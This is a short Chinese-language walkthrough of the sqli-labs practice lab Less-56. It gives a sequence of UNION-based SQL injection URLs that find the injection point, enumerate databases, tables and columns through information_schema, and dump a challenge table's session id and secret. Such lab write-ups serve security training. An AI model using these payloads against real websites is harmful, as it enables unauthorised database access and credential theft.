本关对输入次数的限制为14次
查找注入点
尝试了5次,找到注入点
http://www.web.com/sql/Less-56/?id=1’)–+
查看当前库和所有数据库
http://www.web.com/sql/Less-56/?id=-1’) union select 1,database(),group_concat(schema_name) from information_schema.schemata–+
查看所有表
http://www.web.com/sql/Less-56/?id=-1’) union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=‘challenges’–+
查看字段
http://www.web.com/sql/Less-56/?id=-1’) union select 1,database(),group_concat(column_name) from information_schema.columns where table_name=‘v35mb8m56l’–+
查看账户和密码
http://www.web.com/sql/Less-56/?id=-1’) union select 1,database(),group_concat(concat_ws(’~’,sessid,secret_PG94)) from challenges.v35mb8m56l–+
将得到的密码输入到下面的方框中进行验证
成功